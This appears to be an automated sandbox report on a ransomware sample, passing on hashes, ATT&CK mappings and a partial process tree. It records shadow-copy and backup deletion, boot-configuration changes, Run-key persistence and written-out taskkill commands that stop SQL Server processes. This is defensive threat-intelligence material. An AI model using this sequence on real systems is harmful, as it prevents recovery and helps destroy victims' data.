f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c

Analysis

max time kernel
164s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
27-02-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
Size

419KB
MD5

17073229079e31a3190e7a8509302b22
SHA1

6ed12dade62a8e420c5b5b295ddd6c4ce83b9549
SHA256

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c
SHA512

7afe620f907740393f021fcd337aaf5ed8b5e903aab3ed592d8695a1d877e41094bbc9aca20e8062c11acf2e288bd96033ffa08544d926be5493be26cb79c647
SSDEEP

6144:4CmPvkrISw8ZMQsFMFEXmtT+n4CQi2oD9HoZwIYaTR/dXszI2lUC4c:L3W6MoFlV+n4CQRoD9IygT/L

Score

10^/10

evasion persistence ransomware

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

description pid process target process

PID 4100 created 3560 4100 f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3448 bcdedit.exe
1180 bcdedit.exe
Renames multiple (142) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

4904 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

464 wbadmin.exe

description	pid	process	target process
PID 4100 created 3560	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	Explorer.EXE

pid	process
3448	bcdedit.exe
1180	bcdedit.exe

pid	process
4904	wbadmin.exe

pid	process
464	wbadmin.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exef38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe\""	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe\""	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.execipher.execipher.exe

description	ioc	process
File opened (read-only)	\??\K:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\X:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\Y:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\A:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\I:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\P:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\Q:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\U:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\Z:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\J:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\L:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\N:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\B:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\M:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\O:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\R:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\W:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\F:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\E:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\H:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\S:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\T:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\V:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
File opened (read-only)	\??\F:	cipher.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\G:	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2416 vssadmin.exe

pid	process
2416	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3872	taskkill.exe
2332	taskkill.exe
744	taskkill.exe
4528	taskkill.exe
4328	taskkill.exe
4004	taskkill.exe
840	taskkill.exe
732	taskkill.exe
3640	taskkill.exe
4508	taskkill.exe
1772	taskkill.exe
1840	taskkill.exe
464	taskkill.exe
3780	taskkill.exe

Modifies registry class 2 IoCs

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1904519900-954640453-4250331663-1000\{4AAAABBC-0BF1-46C1-9B2D-C2D690E523B7}	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

pid	process
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	732	taskkill.exe
Token: SeDebugPrivilege	464	taskkill.exe
Token: SeDebugPrivilege	4528	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	4328	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	3872	taskkill.exe
Token: SeDebugPrivilege	2332	taskkill.exe
Token: SeDebugPrivilege	744	taskkill.exe
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	3780	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3028	WMIC.exe
Token: SeSecurityPrivilege	3028	WMIC.exe
Token: SeTakeOwnershipPrivilege	3028	WMIC.exe
Token: SeLoadDriverPrivilege	3028	WMIC.exe
Token: SeSystemProfilePrivilege	3028	WMIC.exe
Token: SeSystemtimePrivilege	3028	WMIC.exe
Token: SeProfSingleProcessPrivilege	3028	WMIC.exe
Token: SeIncBasePriorityPrivilege	3028	WMIC.exe
Token: SeCreatePagefilePrivilege	3028	WMIC.exe
Token: SeBackupPrivilege	3028	WMIC.exe
Token: SeRestorePrivilege	3028	WMIC.exe
Token: SeShutdownPrivilege	3028	WMIC.exe
Token: SeDebugPrivilege	3028	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3028	WMIC.exe
Token: SeRemoteShutdownPrivilege	3028	WMIC.exe
Token: SeUndockPrivilege	3028	WMIC.exe
Token: SeManageVolumePrivilege	3028	WMIC.exe
Token: 33	3028	WMIC.exe
Token: 34	3028	WMIC.exe
Token: 35	3028	WMIC.exe
Token: 36	3028	WMIC.exe
Token: SeBackupPrivilege	940	vssvc.exe
Token: SeRestorePrivilege	940	vssvc.exe
Token: SeAuditPrivilege	940	vssvc.exe
Token: SeShutdownPrivilege	5300	explorer.exe
Token: SeCreatePagefilePrivilege	5300	explorer.exe
Token: SeShutdownPrivilege	5300	explorer.exe
Token: SeCreatePagefilePrivilege	5300	explorer.exe
Token: SeShutdownPrivilege	5300	explorer.exe
Token: SeCreatePagefilePrivilege	5300	explorer.exe
Token: SeShutdownPrivilege	5300	explorer.exe
Token: SeCreatePagefilePrivilege	5300	explorer.exe
Token: SeShutdownPrivilege	5300	explorer.exe
Token: SeCreatePagefilePrivilege	5300	explorer.exe
Token: SeShutdownPrivilege	5300	explorer.exe
Token: SeCreatePagefilePrivilege	5300	explorer.exe
Token: SeShutdownPrivilege	5300	explorer.exe
Token: SeCreatePagefilePrivilege	5300	explorer.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

explorer.exe

pid process

5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
Suspicious use of SendNotifyMessage 8 IoCs

Processes:

explorer.exe

pid process

5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe
5300 explorer.exe

pid	process
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe

pid	process
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe
5300	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4100 wrote to memory of 620	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 620	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 620	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 620 wrote to memory of 1604	620	cmd.exe	cmd.exe
PID 620 wrote to memory of 1604	620	cmd.exe	cmd.exe
PID 4100 wrote to memory of 3248	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3248	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3248	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 3248 wrote to memory of 3872	3248	cmd.exe	cmd.exe
PID 3248 wrote to memory of 3872	3248	cmd.exe	cmd.exe
PID 3872 wrote to memory of 732	3872	cmd.exe	taskkill.exe
PID 3872 wrote to memory of 732	3872	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 3876	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3876	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3876	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 3876 wrote to memory of 2652	3876	cmd.exe	cmd.exe
PID 3876 wrote to memory of 2652	3876	cmd.exe	cmd.exe
PID 2652 wrote to memory of 1840	2652	cmd.exe	taskkill.exe
PID 2652 wrote to memory of 1840	2652	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 3320	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3320	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3320	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 3320 wrote to memory of 1600	3320	cmd.exe	cmd.exe
PID 3320 wrote to memory of 1600	3320	cmd.exe	cmd.exe
PID 1600 wrote to memory of 464	1600	cmd.exe	taskkill.exe
PID 1600 wrote to memory of 464	1600	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 2868	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 2868	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 2868	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 2868 wrote to memory of 844	2868	cmd.exe	cmd.exe
PID 2868 wrote to memory of 844	2868	cmd.exe	cmd.exe
PID 844 wrote to memory of 4528	844	cmd.exe	taskkill.exe
PID 844 wrote to memory of 4528	844	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 3276	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3276	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 3276	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 3276 wrote to memory of 4800	3276	cmd.exe	cmd.exe
PID 3276 wrote to memory of 4800	3276	cmd.exe	cmd.exe
PID 4800 wrote to memory of 3640	4800	cmd.exe	taskkill.exe
PID 4800 wrote to memory of 3640	4800	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 4928	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 4928	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 4928	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4928 wrote to memory of 1176	4928	cmd.exe	cmd.exe
PID 4928 wrote to memory of 1176	4928	cmd.exe	cmd.exe
PID 1176 wrote to memory of 4004	1176	cmd.exe	taskkill.exe
PID 1176 wrote to memory of 4004	1176	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 4500	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 4500	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 4500	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4500 wrote to memory of 4452	4500	cmd.exe	cmd.exe
PID 4500 wrote to memory of 4452	4500	cmd.exe	cmd.exe
PID 4452 wrote to memory of 4328	4452	cmd.exe	taskkill.exe
PID 4452 wrote to memory of 4328	4452	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 1856	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 1856	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 1856	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 1856 wrote to memory of 1300	1856	cmd.exe	cmd.exe
PID 1856 wrote to memory of 1300	1856	cmd.exe	cmd.exe
PID 1300 wrote to memory of 840	1300	cmd.exe	taskkill.exe
PID 1300 wrote to memory of 840	1300	cmd.exe	taskkill.exe
PID 4100 wrote to memory of 5032	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 5032	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe
PID 4100 wrote to memory of 5032	4100	f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
"C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4100
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3872
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im sqlbrowser.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:732
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im sql writer.exe
      4⤵
      Kills process with taskkill
      PID:1840
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im sqlserv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:464
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:844
  - - C:\Windows\system32\taskkill.exe
      taskkill -f -im msmdsrv.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4528
- C:\Windows\SysWOW64\cmd.exe
  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3276
- - C:\Windows\system32\cmd.exe
